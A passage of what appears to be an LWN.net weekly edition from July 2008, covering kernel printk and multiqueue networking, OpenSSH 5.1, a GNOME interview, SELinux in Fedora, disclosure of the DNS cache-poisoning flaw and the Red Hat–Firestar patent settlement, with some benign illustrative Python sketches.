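For readers who have not dealt with symbol lookup, the idea behind %pS can be sketched in user space.  This is a rough model only, not the kernel's kallsyms code: the symbol table, its addresses and sizes, and the "name+offset/size" output layout are all assumptions made for the illustration.  The fallback to plain hexadecimal mirrors the behavior described above for kernels without kallsyms.

```python
import bisect

# Hypothetical symbol table: (start address, size, name), sorted by address.
# The addresses and sizes are invented for this sketch.
SYMBOLS = [
    (0xffffffff80200000, 0x40, "do_fork"),
    (0xffffffff80200040, 0x100, "schedule"),
    (0xffffffff80200140, 0x20, "printk"),
]
STARTS = [start for start, _, _ in SYMBOLS]


def symbolize(address):
    """Return 'name+0xoffset/0xsize' for address, or plain hex if unknown."""
    # Find the last symbol whose start address is <= address.
    i = bisect.bisect_right(STARTS, address) - 1
    if i >= 0:
        start, size, name = SYMBOLS[i]
        if address < start + size:
            return "%s+0x%x/0x%x" % (name, address - start, size)
    # No symbol covers this address: fall back to the raw value.
    return "0x%016x" % address
```

With this table, `symbolize(0xffffffff80200050)` yields `schedule+0x10/0x100`, while an address outside every symbol, such as `0x1000`, comes back as `0x0000000000001000`.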


The clear intent is to allow additional extensions to printk() to
support other kernel data structures.  The change to
vsprintf(), which underlies printk(), actually allows for
any sequence of alphanumeric characters to appear after the %p.
The new pointer() helper function currently only implements the
two new specifiers, but others have been mentioned.  


The most likely additions are for things like IPv4, IPv6, and MAC
addresses.  Torvalds specifically mentions
using %p6N as a possibility for IPv6 addresses.  Some would rather
have seen a different syntax used (%p{feature} was suggested), but that
would conflict with some current uses of %p in the kernel.  Torvalds is
happy with his choice:

I _expressly_ chose '%p[alphanumeric]*' because it's basically
totally insane to have that in a *real* printk() string: the end result
would be totally unreadable.


The patch took an interesting route to the kernel, with much of the
discussion evidently going on in private between Torvalds, Andrew Morton,
and others before popping up on the linuxppc-dev and linux-ia64 mailing
lists.  The patch itself has not been posted to linux-kernel in its
complete form, but was
committed on July 6.  While it is a bit strange to see such a change this
late in the development cycle, it is a change that should have no impact as
there are no
plans to actually use the new specifiers in 2.6.26.


		Multiqueue networking


One of the fundamental data structures in the networking subsystem is the
transmit queue associated with each device.  

The core networking code will call a driver's
hard_start_xmit() function to let the driver know that a packet is
ready for transmission; it is then the
driver's job to feed that packet into the hardware's transmit queue.
The result is a data structure which looks vaguely like this:


"Vaguely" because the list of sk_buff structures (SKBs - the
internal representation of packets) does not exist in this form within the
kernel; instead, the driver maintains the queue in a way that the hardware
can process it.

This is a scheme which has worked well for years, but it has run into a
fundamental limitation: it does not map well to devices which have multiple
transmit queues.  Such devices are becoming increasingly common, especially
in the wireless networking area.  Devices which implement the Wireless
Multimedia Extensions, for example, can have four different classes of
service: video, voice, best-effort, and background.  Video and voice
traffic may receive higher priority within the device - it is
transmitted first - and the device can also take more of the available air
time for such packets.  On the other hand, the queues for this kind of traffic may
be relatively short; if a video packet doesn't get sent on its way quickly,
the receiving end will lose interest and move on.  So it might be better to just
drop video packets which have been delayed for too long.  


On the other hand, the "background" level only gets transmitted if there is
nothing else to do; it is well-suited to low-priority traffic like BitTorrent
or email from the boss.  It would make sense to have a
relatively long queue for background packets, though, to be able to take
full advantage of a lull in higher-priority traffic.


Within these devices, each class of service has its own transmit queue.
This separation of traffic makes it easy for the hardware to choose which
packet to transmit next.  It also allows independent limits on the size of
each queue; there is no point in filling the device's queue space with
background traffic which is not going to be transmitted in any case.  But
the networking subsystem does not have any built-in support for multiqueue
devices.  This hardware has been driven using a number of creative
techniques which have gotten the job done, but not in an optimal way.  That
may be about to change, though, with the advent of David Miller's multiqueue transmit patch
series. 


The current code treats a network device as the fundamental unit which is
managed by the outgoing packet scheduler.  David's patches change that
idea somewhat, since each transmit queue will need to be scheduled
independently.  So there is a new netdev_queue structure which
encapsulates all of the information about a single transmit queue, and
which is protected by its own lock.  Multiqueue drivers then set up an
array of these structures.  So the new data structure can, with sufficient
imagination, be seen to look something like this:


Once again, the actual lists of outgoing packets normally exist in the form
of special data structures in device-accessible memory.  Once the device
has these queues set up for it, the various policies associated with each
class of service can be implemented.  Each queue is managed independently,
so more voice packets can be queued even if some other queue (background,
say) is overflowing.
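
The value of independently managed queues can be shown with a toy user-space model.  This is a sketch under stated assumptions, not kernel code: the `TxQueue` class, the queue limits, the priority ordering (voice first), and the strict-priority transmit rule are all invented for illustration; real hardware arbitrates between its queues in its own way.

```python
from collections import deque


class TxQueue:
    """Toy stand-in for one transmit queue with its own length limit."""

    def __init__(self, name, limit):
        self.name = name
        self.limit = limit
        self.packets = deque()
        self.dropped = 0

    def enqueue(self, packet):
        """Queue a packet, or drop it if this queue (and only this one) is full."""
        if len(self.packets) >= self.limit:
            self.dropped += 1
            return False
        self.packets.append(packet)
        return True


# Hypothetical limits: short queues for latency-sensitive traffic,
# a long one for background traffic.
queues = [
    TxQueue("voice", 4),
    TxQueue("video", 4),
    TxQueue("best-effort", 16),
    TxQueue("background", 64),
]


def transmit_next(queues):
    """Pick the next packet, scanning from highest to lowest priority."""
    for q in queues:
        if q.packets:
            return q.packets.popleft()
    return None
```

If 100 packets are pushed at the background queue, 36 of them are dropped, but a voice packet arriving afterward is still accepted and is the first one handed to `transmit_next()`.  With a single shared queue, that voice packet would have been dropped or stuck behind the background traffic.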

David would appear to have worked hard to avoid creating trouble for
network driver developers.  Drivers for single-queue devices need not be
changed at all, and the addition of multiqueue support is relatively
straightforward.  The first step is to replace the
alloc_etherdev() call with a call to:


The new queue_count parameter describes the maximum number of
transmit queues that the device might support.  The actual number in use
should be stored in the real_num_tx_queues field of the
net_device structure.  Note that this value can only be changed
when the device is down.

A multiqueue driver will get packets destined for any queue via the usual
hard_start_xmit() function.  To determine which queue to use, the
driver should call:


The return value is an index into the array of transmit queues.  One might
well wonder how the networking core decides which queue to use in the first
place.  That is handled via a new net_device callback:


The patch set includes an implementation of select_queue() which
can be used with WME-capable devices.
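
The division of labor described here (the core picks a queue, the driver later reads that choice back) can be modeled in a few lines.  This is a user-space sketch only, and it is not the select_queue() implementation from the patch set.  The `Packet` class, its `queue_mapping` attribute, the priority table, and the clamping to the number of queues in use are assumptions made for the example; only the names select_queue and real_num_tx_queues come from the text above.

```python
# Hypothetical mapping from a 0-7 packet priority to a queue index, with
# queues ordered 0=voice, 1=video, 2=best-effort, 3=background.
PRIORITY_TO_QUEUE = {7: 0, 6: 0, 5: 1, 4: 1, 3: 2, 0: 2, 2: 3, 1: 3}


class Packet:
    """Toy packet carrying a priority and the queue chosen for it."""

    def __init__(self, priority):
        self.priority = priority
        self.queue_mapping = 0  # filled in before the driver sees the packet


def select_queue(packet, real_num_tx_queues):
    """Model of the per-device callback: choose a queue index for a packet."""
    queue = PRIORITY_TO_QUEUE.get(packet.priority, 2)
    # Never return an index beyond the queues actually in use.
    return min(queue, real_num_tx_queues - 1)


def core_queue_packet(packet, real_num_tx_queues):
    """Model of the networking core: record the chosen queue in the packet."""
    packet.queue_mapping = select_queue(packet, real_num_tx_queues)
    return packet


def driver_start_xmit(packet, hardware_queues):
    """Model of the driver: read the mapping back and feed that queue."""
    hardware_queues[packet.queue_mapping].append(packet)
```

The point of the split is that queue-selection policy lives in one callback, while the transmit path simply honors whatever index was stored in the packet.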

About the only other required change is for multiqueue drivers to inform
the networking core about the status of specific queues.  To that end,
there is a new set of functions:


A call to netdev_get_tx_queue() will turn a queue index into the
struct netdev_queue pointer required by the other functions, which
can be used to stop and start the queue in the usual manner.  Should the
driver need to operate on all of the queues at once, there is a set of
helper functions:


Naturally, there are a few other details to deal with, and the multiqueue
interface is likely to evolve somewhat over time.  At one point, David was
hoping to have this feature ready for inclusion into 2.6.27, but that goal
looks overly ambitious now.  It does seem that much of the groundwork will
be merged in the next development cycle, though, meaning that full
multiqueue support should be in good shape for merging in 2.6.28.

		What's coming in OpenSSH 5.1


OpenSSH is an important
tool for remote connectivity:
"OpenSSH is a FREE version of the SSH connectivity tools that technical users of the Internet rely on. Users of telnet, rlogin, and ftp may not realize that their password is transmitted across the Internet unencrypted, but it is. OpenSSH encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other attacks. Additionally, OpenSSH provides secure tunneling capabilities and several authentication methods, and supports all SSH protocol versions."


On July 6, 2008, a call for testing was issued for OpenSSH version 5.1:
"OpenSSH 5.1 is almost ready for release, so we would appreciate testing
on as many platforms and systems as possible. This release is one of
the biggest in recent years, with two hackathons' worth of improvements
and fixes for some of our most recalcitrant bugs."

A large number of new features are being added to the OpenSSH suite
of utilities.  Some of the feature highlights include:

 Experimental SSH fingerprint visualization (see this paper [pdf]) will produce visual representations of host keys for quick key validation.
 The sshd daemon will get a new extended test mode with capabilities for dumping the configuration and testing match rules.
 A "df" command has been added to the sftp client for displaying server filesystem information.
 There will be a new mechanism for disabling further session requests between ssh and sshd.
 The ssh-keygen command will get a new -l option that will allow searching for a host in the known_hosts file.
 ssh and sshd will better support port forward destination hosts with multiple forward addresses.
 Some basic interoperability tests have been added for Twisted Conch.
 Configuration file changes:
	Classless Inter-Domain Routing (CIDR) address/masklen matching will be added to sshd_config "Match address" blocks and authorized_keys "from" restrictions.
	A new sshd_config AllowAgentForwarding option will control authentication agent forwarding.
	The sshd_config MaxSessions option will give finer grained control to the number of multiplexed sessions.
	sshd_config "Match group" blocks will get new support for group negation.
	sshd_config match blocks will now support the MaxAuthTries option.
 Performance improvements.
 Documentation improvements.
 Bug fixes.
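
For readers unfamiliar with the address/masklen notation mentioned in the configuration changes above, here is a minimal sketch of what CIDR matching means.  It uses Python's standard ipaddress module and is not OpenSSH's matching code; the function name and the example addresses are made up for the illustration.

```python
import ipaddress


def address_matches(client_ip, patterns):
    """Return True if client_ip falls inside any address/masklen pattern."""
    addr = ipaddress.ip_address(client_ip)
    for pattern in patterns:
        # strict=False tolerates patterns with host bits set, e.g. 192.168.1.5/24
        network = ipaddress.ip_network(pattern, strict=False)
        if addr.version == network.version and addr in network:
            return True
    return False
```

A pattern such as 192.168.1.0/24 covers every address whose first 24 bits match, so 192.168.1.77 matches it and 192.168.2.1 does not.  That lets one rule stand in for what would otherwise be a long list of individual addresses or a looser wildcard.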


For those who would like to experiment with the new features,
a series of
snapshot releases
are available for download.


		Questions and answers with Stormy Peters


Those who have followed the GNOME project over the last few years have seen
the wishlist item for a "business manager" or "executive director" for the
GNOME Foundation; the subject was especially likely to come up during
Foundation board elections.  This position has remained unfilled for some
time, seemingly a result of uncertain funding and the difficulty of finding
the right person.  These problems would appear to be in the past now; on
July 7, the GNOME Foundation announced
that this position would be filled by Stormy Peters, formerly of OpenLogic.


Stormy now has the challenge of helping an energetic and independent-minded
development community build on its success and achieve its ambitious goals
for the future.  We asked her a few questions about how she thought that
might go; here's what we got back. 

LWN: This is a new position, in that the GNOME Foundation has never had an
executive director before.  So people may be wondering what you'll
actually be doing.  How do you expect to be spending your time in this
position?


	Actually, the GNOME Foundation has had an executive director before
	but not for the past few years. I will spend my time strengthening
	relationships with the existing sponsors, working on finding new
	industry partners and helping the Board of Directors and the
	community execute some of their great ideas for GNOME. The GNOME
	community's goal is to provide an easy to use, intuitive interface
	for Linux and Unix as well as a powerful development platform.


A year from now, what do you hope your biggest accomplishments will be?


	The GNOME community has a tremendous amount of passion and a real
	dedication to making a development platform and a desktop that is
	easy to use. I think showing the world that, getting the word out
	and showing how it is changing the way people are able to use their
	computers and mobile devices is key.  So to answer your question,
	I'd like to see a stronger Foundation (more sponsors and members),
	increase the amount of great ideas that get executed, and make
	GNOME a household name. :)


Next year, it seems reasonably likely that there will be a combined
GNOME/KDE developers conference in Europe.  What are your thoughts on the
current state of cooperation with KDE, and how do you think it could be
improved?


	I hope we have a combined GUADEC/Akademy next year. KDE and GNOME
	have been working more closely together during the past year or so
	and they have accomplished some good things like with dbus. I think
	anytime you get great developers together, good things happen.


One high-profile GNOME goal was 10x10 - 10% of the desktop market by 2010.
In mid-2008, it seems fairly clear that this goal will not be achieved.  Do
you think that the desktop remains a suitable target for free software, or
should GNOME deemphasize the traditional desktop in favor of other goals?


	I do think that a free and open source desktop is still a great
	goal. While the number of free and open source desktops out there
	might be small, it is growing tremendously. Just look at the number
	of laptops that ship with GNU/Linux (from Dell, Asus and other) as
	well as the number of mobile devices that are based on free and
	open source software.


Though the GNOME Foundation is not intended to control the technical
direction of the project, it clearly cannot be without influence there.
Are there technical directions you would like to see the development
community take, directions which would help to convince manufacturers to
incorporate GNOME technologies and contribute to GNOME development?


	I'll be working closely with the community and the board of
	advisors to figure out how I can best help with technical
	directions. One thing we'd like to see from our sponsors - through
	our board of advisors - is more information on what end-users would
	like to see in GNOME.


In the past you have spoken about how introducing money into free software
development can have a demotivating effect on developers.  Do you fear that
sort of problem as GNOME becomes more commercially successful?  How would
you hope to avoid that kind of difficulty?


	I don't think it's an issue in the short term as growing the GNOME
	Foundation doesn't directly correspond to hiring lots of
	developers. But that said, I think the key is maintaining the
	intrinsic motivations that make GNOME contributors such a
	passionate group of developers.


Thanks to Stormy for being kind enough to answer our questions in the
middle of what must have been a very busy time at GUADEC in Istanbul.

		SELinux and Fedora


Red Hat has undoubtedly done more to make SELinux usable than any other
organization, but has it actually reached the point where it can be enabled
by default for all desktops?  The Fedora project clearly thinks so.  Not only
is SELinux enabled, but the installer no longer has an option to disable
it or to put it into "permissive" mode.  Most of the posts in a thread on
the fedora-devel mailing
list see that as the right choice, but some are not so sure.  


Jon Masters started things off by making a request to restore the 
installation option, giving several reasons summing up with:

But there are numerous other justifications I could give, including my
personal belief that it's absolutely nuts to thrust SE Linux upon
unsuspecting Desktop users (who don't know what it is anyway) without
giving them the choice to turn it off.


His reasons were unconvincing to many as he was not considered to be a
"normal" desktop user; the things he was doing were much more technical
than the users that are being targeted by the SELinux policies distributed
with Fedora 9.  The problems he reported were resolved quickly, but the
fact remains that there are paths through Fedora—even just using
desktop applications—that will result in SELinux-caused failures.
The Red Hat SELinux team is very responsive, but users will get frustrated
quickly if things they are trying to do fail in mysterious (to them) ways.


Alan Cox argues against providing an installation choice because he doesn't
think users have enough context to make a sensible choice.  He likens it to a
car with multiple choices for safety features:

"This car has brakes, enable them ?"
"Would you like the seatbelts to work ?"
"Shall I enable the airbag ?"


When push comes to shove, Masters and a few others see the default of
SELinux installed in "enforcing" mode as being too restrictive.  It is
likely to cause users to become annoyed with Fedora as a whole because one
or more paths through the applications have not yet been tested.  That,
unfortunately, is the crux of the issue: SELinux policies are being
developed in a reactive manner based on testing applications and adding
exceptions for actions they perform.


As a security tool, SELinux is a good choice, because it essentially denies
everything by default.  Policies are added that will allow certain actions
for users and applications.  Its complexity is legendary, however, which is why
Red Hat (and others) have made a substantial effort to make it work
semi-invisibly.  They started by generating policies for network-facing
services and have now moved into securing desktop applications,
particularly programs like web browsers which are increasingly the target
of attacks.


SELinux has three modes: disabled, which turns off SELinux;
permissive, which just logs attempts to do things that violate the
policies; and
enforcing, which disallows any access that is denied by the policies.
When getting applications to work with SELinux, permissive mode is typically
used. The log messages are analyzed to determine what changes should be
made to the policies or to the application so that they work
together.  If there are features that were not tested in the application that
require additional privileges, the first user that tries that feature in
enforcing mode will run into trouble.


When that happens, SELinux can be put into permissive mode with a simple
GUI or configuration file change, followed by a reboot.  One of the
problems is that users may very well not know that SELinux is the source of
their problem.  There are tools, like SETroubleShoot, that can help alert users, but it is still a
frustrating, hard-to-comprehend problem at times.  Once the user has
"fixed" the problem by disabling SELinux, they are unlikely to turn it back
on. 
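
For readers who have never looked at the configuration file in question,
here is a minimal sketch of how the configured mode might be read.  It
assumes the file consists of "SELINUX=<mode>" style lines, as
/etc/selinux/config does on Fedora; the function name and the sample text
are made up for illustration and are not part of any SELinux tool.

```python
# Sketch: pull the SELinux mode out of the text of a configuration file.
# Assumption: the file uses "SELINUX=<mode>" lines, as Fedora's
# /etc/selinux/config does.  The helper name is hypothetical.

VALID_MODES = ("enforcing", "permissive", "disabled")


def selinux_mode_from_config(text):
    """Return the configured mode, or None if no valid SELINUX= line exists."""
    mode = None
    for line in text.splitlines():
        line = line.strip()
        # Skip blank lines and comments.
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        # Only the SELINUX key matters here; SELINUXTYPE and others are ignored.
        if sep and key.strip() == "SELINUX":
            value = value.strip().lower()
            if value in VALID_MODES:
                mode = value
    return mode


# Illustrative file contents, not copied from a real system.
sample = """\
# This file controls the state of SELinux on the system.
SELINUX=permissive
SELINUXTYPE=targeted
"""

print(selinux_mode_from_config(sample))
```

A user who has "fixed" a problem in the manner described above would see
"permissive" or "disabled" here, rather than "enforcing".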


It is a difficult choice, but Fedora is firmly on the side of forcing
non-technical users into using SELinux, at least until it breaks.  More
technical users will know about SELinux and, perhaps, be able to make more
informed choices.
One of Red Hat's SELinux developers, James Morris, neatly sums up the reasons it is important to
continue pushing SELinux:

The only way to really make progress in improving security is to make it a
standard part of the computing landscape; for it to be ubiquitous and
generalized, which is the aim of the SELinux project.

[...]
Punting the decision to the end user during installation is possibly the
worst option.  It's our responsibility as the developers of the OS to both
get security right and make it usable.  It's difficult, indeed, but not
impossible.


There are efforts underway to add easier ways for users to report SELinux
log messages, perhaps even in an automated way, so that policy or
application problems get identified and fixed more quickly.  While it may
not be easy for long-time Linux users to adjust to an SELinux-enabled
system, it is getting to the point where average users, who never use
the command line, rarely run into problems.  And those are just the kind of
users who need the level of security that SELinux can provide.


		Fedora takes Linux to college


The idea of Linux in the classroom is nothing new. From a grassroots push for district-wide adoption in secondary schools, to a plan to offer the One Laptop Per Child program in every developing country, the FOSS community is always looking for ways to encourage schools to use Linux. Recently, however, there's a new movement afoot that's aimed at snapping up a segment of computer users before they spend their money on computers with commercial operating systems. Linux is headed to college.

For the last few weeks, volunteer members of Fedora's marketing team have been kicking around ideas on ways to encourage college students to give Linux a try and draw new users into the Fedora fold. Rather than approach university IT departments running Windows to convince them to switch operating systems, the team hopes to create a groundswell of college-aged users who will march into classrooms and lecture halls with Fedora-laden laptops and eagerly dive into work-study projects that focus on Linux development.

Jack Aboutboul, Red Hat's Community Engineer and the main impetus behind the tentatively-named Campus Ambassador program, says that, though it is similar to Fedora's existing Ambassador program, the new program will have a different governance model and slightly different goals. Students from Auburn, Texas A&M, Berkeley, and other U.S. colleges, as well as team members attending universities in other countries, have already shown an interest in assuming the role of Campus Ambassadors, and have agreed to speak at campus events about the benefits of Fedora and of Linux in general.

Taking the idea a step further, many Fedora team members would like to see the development of promotional material designed with college students in mind, such as posters that encourage students in the art department to volunteer their skills creating artwork for Linux distros. As one Fedora marketing team member notes, "How many marketing majors are aware that there are real life marketing opportunities for them within the Fedora project while they are still students? Reaching these students should be one focus of any campus outreach."

At least one school, Cabrillo College in Santa Cruz County, California, is already hard at work promoting Fedora on its campus. In addition to forming a GNU/Linux Users Group (LUG) and holding regular installfests, the LUG is also creating its own Fedora-based distro called Seahawk GNU/Linux, named after the school mascot. LUG President Larry Cafiero explains, "Not that the world needs yet another distro, mind you, but we're using the project as a teaching tool more than an actual distro that will take the world by storm." He says that not only do students gain hands-on familiarity with Linux, but "those who get introduced to GNU/Linux through the school-based distro get a sort of introduction to Fedora as well."

Since Fedora already has a strong Ambassador Program, the question of why a separate university Ambassadorship is necessary has come up. Essentially, it boils down to a difference in how users will be mentored. In the typical Ambassador arrangement, Fedora users simply evangelize Linux and encourage people to give Fedora a try while offering assistance and tips along the way. Marketing team member Chris Tyler sees the role of Campus Ambassador as more finely-tuned and as "a matchmaker between a student, a potential need (project), and community resources." Tyler says that there are many benefits to this arrangement, including the opportunity for students to work on projects with a larger user base, which will therefore have a bigger real-world impact than student projects that remain inside the walls of the school.

Team member Jeff Spaleta says finding projects with a long shelf life is vital to keeping students interested in Linux, and good for the long-term health of the community. "If students as part of their degrees need to work on a year or semester-long project, I want Fedora to be obvious place to look for compelling things to work on, with an aim towards well scoped projects that have a good chance for long lived utility," he says. "I hate seeing good academic projects die because there was no real plan to hand them off outside of that academic group which incubated them."

Team members seem to be in agreement that the Ambassador program is a winning situation for everyone. Students get hands-on experience — and, in some cases, a grade — for participating in a software development project. Computer technology departments can offer a wider learning environment with little to no investment, Fedora may garner new users, and the Linux community as a whole grows. 

In an effort to move the Campus Ambassador project forward, Jack Aboutboul plans to formally present the idea at a Community Architecture meeting later this month.

		Secrecy and the DNS flaw


By now, most folks will have seen reports of the design flaw discovered in DNS,
as it has received fairly widespread coverage, even in the non-technical press.
It is rare to see such a coordinated disclosure and security update among
so many of the big players in the computer industry.  While fixes abound,
the actual problem has yet to be disclosed, which has both positives and
negatives. 


Responsible disclosure policies dictate that vulnerabilities be kept secret
until all affected vendors can create an update.  Because this flaw is in
the design of DNS, most implementations were affected.  This still doesn't
quite explain the roughly six months between the discovery of the problem
and the release of the fix.  Evidently it took a meeting of the minds at
the Microsoft campus in March to decide upon the right course of action.
Once the fixes were done, presumably they were released on the next "patch
Tuesday"—Microsoft's monthly security update day.


Normally, once fixes are available, information about the vulnerability is
released.  But, for a number of reasons, that has not happened in this
case.  One of the main reasons is that DNS is an essential internet service
and it will take time for affected users to patch their systems.  In
addition, there have been no reports of this flaw being exploited "in the
wild", reducing the pressure to divulge it.


Security researcher Dan Kaminsky, who discovered the flaw, has yet another, "blatantly selfish"
reason for keeping it quiet; he would like to be able to announce it himself at Black Hat in Las Vegas in early August:

While I'm out there, trying to get all these bugs scrubbed — old and
new — 
please, keep the speculation off the @public forums and IRC channels. We're
a curious lot, and we want to know how things break. But the public needs
at least a chance to deploy this fix, and from a blatantly selfish
perspective, I'd kind of like my thunder not to be completely stolen in
Vegas.


None of these seem like horrible reasons to keep the vulnerability quiet
for a time (roughly 30 days), but they do leave some DNS implementations
and worried administrators without the information they need to evaluate
the situation.  Administrators do not know what traffic patterns or
other symptoms to look for to determine if exploits are being attempted.
Smaller, less prominent DNS implementations were not included in the
collaboration, thus they don't have enough information to decide whether
they are vulnerable or not. 


A perfect example is Dnsmasq, a
lightweight DNS server for smaller networks.  Dnsmasq is often used in
embedded Linux distributions targeted for home wireless routers.  Simon
Kelley, Dnsmasq developer, was asked about the vulnerability; his response
speaks volumes:

I wasn't contacted in advance about this, and no patch for dnsmasq has
been released. Since the exact nature of the new vulnerability has not
(as far as I know) been announced, I don't know if dnsmasq is vulnerable.


Kelley has since released
a patched version, but it is still unknown whether it is needed or,
really, if it even fixes the problem.  It is difficult to know for sure that
a security hole has been closed if information about the hole is not
available.  This points to the problems that can come from withholding
vulnerability information. 


Based on the patches and some information from Kaminsky and others, it is
clear that this is a cache
poisoning vulnerability.  Since source port randomization is the change
that was applied to alleviate, but not eliminate, the flaw, we can surmise
that Kaminsky found a way to reduce the number of spoofed replies that need
to be sent to something tractable.  According to the Internet Systems Consortium,
developers of the BIND DNS server, the only true solution is DNSSEC, which implies that
the current fixes only make cache poisoning less likely, not impossible.


Source port randomization is a technique that has been advocated by Daniel
J. Bernstein (a.k.a. djb) for many years.  He implemented it in his djbdns name server long ago.
Essentially, it chooses a random source UDP port for each query that the
name server makes, which has the effect of increasing the randomness that
an attacker needs to be able to predict before being able to poison the
cache.
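
The arithmetic behind that claim can be sketched in a few lines.  The
following is an illustration only, not code from djbdns or any other name
server: it assumes that an off-path attacker must guess both the 16-bit DNS
transaction ID and the source port, and that the server draws ports
uniformly from 1024 through 65535 (the range is an assumption; real
implementations differ).  All function names are hypothetical.

```python
import secrets

TXID_BITS = 16                      # DNS transaction IDs are 16 bits wide
PORT_LOW, PORT_HIGH = 1024, 65535   # assumed range of usable source ports


def random_query_params():
    """Pick an unpredictable (source_port, transaction_id) pair for one query."""
    port = PORT_LOW + secrets.randbelow(PORT_HIGH - PORT_LOW + 1)
    txid = secrets.randbelow(1 << TXID_BITS)
    return port, txid


def guess_space(randomize_port):
    """Count the equally likely combinations a blind spoofer must guess among."""
    ids = 1 << TXID_BITS
    ports = (PORT_HIGH - PORT_LOW + 1) if randomize_port else 1
    return ids * ports


fixed = guess_space(randomize_port=False)
randomized = guess_space(randomize_port=True)
print("fixed source port:     ", fixed)
print("randomized source port:", randomized)
print("growth factor:         ", randomized // fixed)
```

Under these assumptions the attacker's search space grows by a factor equal
to the number of usable ports.  That makes a successful forgery far less
likely per attempt, but it does not make one impossible, which is
consistent with the view that randomization alleviates the flaw rather than
eliminating it.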


While the market share of Dnsmasq may be minuscule, there are certainly
other DNS implementations that are also concerned.  In addition, we are
relying on those 
who are "in the know" to be on the lookout for suspicious traffic that
might indicate the vulnerability being exploited.  Kaminsky is certainly
under no obligation to reveal anything, but one wonders if the safest
course would have been for him to provide details now, even at the expense
of his "thunder".


		What Red Hat and Firestar agreed to


On July 15, Red Hat and Firestar released
the terms of the settlement [PDF] of
their patent suit.  When we last
looked at this settlement, those terms were not available.  Now we can
examine exactly what was agreed to and assess the degree of protection that
Red Hat actually negotiated for the wider community.  It may be tempting to
say that recent events have reduced the relevance of this settlement, but
that would be a mistake; what Red Hat has done here still matters.


Those recent events, of course, are dominated by Sun's announcement that it
had successfully challenged the Firestar patent; the US Patent and Trademark
Office (PTO) has officially rejected all of Firestar's claims.  As your editor
(along with numerous others) has said, this should not have been a
particularly hard thing to do; the weakness of this particular patent was
evident after even a cursory reading.  So one might well wonder why Red Hat
chose to pay the troll in this particular case.


And, incidentally, Red Hat did pay.  Naturally enough, the specific payment
terms have been removed from the agreement, but a payment was a part of the
deal.


It is nice that Sun took a less compromising approach to this case, even
though it was not named as a defendant.  But Sun's success has not rendered
this settlement moot, for a few reasons.  To begin with, Firestar now has
two months to fight the PTO decision and reinstate its patent.  That looks
like a difficult task, but, with the PTO, one never really knows.  Second,
the settlement does not cover just that one patent; it covers just about
any patent that Firestar owns or will acquire in the next five years -
though some of that coverage goes away in 2013.  And, perhaps most
importantly, Red Hat clearly sees this settlement as a template for the
resolution of other patent suits which are certain to come in the future.


The settlement itself reads somewhat like a Pascal program; one must start
toward the bottom and read it in reverse.  Following that analogy, the main
program can be found in section 5.2:


	Licensor grants and promises to grant to Red Hat Community Members
	a perpetual, fully paid-up, royalty-free, irrevocable worldwide
	license of the Licensed Patents to engage in any and all activities
	related to Red Hat licensed Products, including without limitation
	to make, have made, use, have used, sell, have sold, offer for
	sale, have offered for sale, provide or have provided, distribute
	or have distributed, import or have imported and Red Hat Licensed
	Product and services related to any Red Hat Licensed Product.


So, these patents have been licensed for any practical purpose to anybody
who happens to be a Red Hat Community Member, as long as they are working
with Red Hat Licensed Software.  Well, almost any purpose; there is a small
catch, as will be seen shortly.  First, though, it is time to read the
declarations 
toward the top of the settlement to see what those terms really mean.  Who,
exactly, is a Red Hat Community Member?


	...any Entity that is a licensee or licensor of, contributes to,
	develops, authors, provides, distributes, receives, makes, uses,
	sells, offers for sale, or imports, in whole or in part, directly
	or indirectly, any Red Hat Licensed Product, including without
	limitation any upstream contributor to, or downstream user or
	distributor of, a Red Hat Licensed Product.


This definition is clearly quite comprehensive; anybody who makes use of
the software is considered to be a Red Hat Community Member.  Your editor
is pondering offering for sale a line of "Proud Red Hat Community Member"
T-Shirts at the next Debconf or OpenBSD hackfest.  This is a club that we
all get to join.

The other key term, though, is "Red Hat Licensed Product," because only
such products are covered by the settlement.  The definition of this
product is simple:


	"Red Hat Licensed Product" means any Red Hat Product, Red Hat
	Derivative Product, or Red Hat Combination Product.


Now, perhaps, we have moved away from Pascal programming and are stuck with
the unenviable task of making sense of a convoluted Java class hierarchy.
One of the subclasses, the definition of "Red Hat Product," is crucial:


	...(a) any product, process, service, or code developed by,
	licensed by, authored by, distributed under a Red Hat Brand by,
	made by, sold under a Red Hat Brand by, offered for sale under a
	Red Hat Brand by, sponsored by, or maintained by Red Hat, (b) any
	predecessor version of any of the foregoing, including without
	limitation any upstream predecessor version any of the foregoing...


So essentially, a Red Hat Product is anything developed or shipped by Red
Hat under one of its trade names.  Anything in Red Hat Enterprise Linux thus
qualifies.  The important thing that Red Hat didn't see fit to specify in
its early PR is that anything in Fedora - also being software distributed
under a Red Hat Brand -  qualifies too.  Since Fedora
packages rather more software than RHEL does, that broadens the coverage of
this agreement considerably.

Also important is the "any predecessor version" clause.  Coverage under
this agreement does not apply to just the specific, possibly patched
version of a program shipped by Red Hat; anything which came before in that
package's upstream is also part of the deal.  And, incidentally, this
coverage does not go away if Red Hat stops shipping a package; just one
shipped version will do.  The Red Hat Brand has become the magic touch
which confers protection against Firestar patents onto any software it
touches. 

Thus far, we have coverage for Red Hat's packages and their predecessors
upstream.  What happens, though, if the upstream project continues to
develop the software beyond the version shipped by Red Hat?  That's where
the "Red Hat Derivative Product" category comes in:


	"Red Hat Derivative Product" means any product, process, service,
	or code that is a direct or indirect Derivative of at least one Red
	Hat Product.


So the combination of "any predecessor version" and the definition of a
Derivative Product means that the entire project is covered, from its first
version through anything it will do in the future - though, once again,
there's a catch.  But, before we get to that, there is the third subclass:
"Red Hat Combination Product."  It refers to a grouping of something which
is one of the two product types described above and something unrelated -
an aggregation.  The apparent intent is to cover situations like dynamic
linking: an application which links to a covered library will, itself, be
covered.

These definitions, too, appear to be quite broad.  Just about
anything which has been shipped by Red Hat, or which has even shared the
same disk drive as something shipped by Red Hat qualifies.  But, as has
been mentioned before, there is one catch in the form of an excluded class
of software:


	a Red Hat Derivative Product that infringes the particular Licensed
	Patent at issue without use of or reference to any portion or
	functionality in or from a Red Hat Product on which the Red Hat
	Derivative Product is based.


(There is similar language for Combination Products as well).  What this
section is saying is that, if a derived product contains infringing code,
that infringing code must have been part of the covered Red Hat product as
well.  In other words, outsiders cannot bless their particular patent
infringement by grabbing enough code from some other project to create a
derived product.  One can see why this restriction was seen to be
necessary; without it, any software (free or proprietary) could have easily
been brought under the coverage umbrella.  Instead, one must first convince
Red Hat to distribute that software at least once.


Plenty of other legalese can be found in the agreement, of course;
interested readers are encouraged to read the whole thing.  But the core of
it is what's described above.  Notably absent (unless it has been redacted
from the payment section, which seems unlikely) is any discussion of what
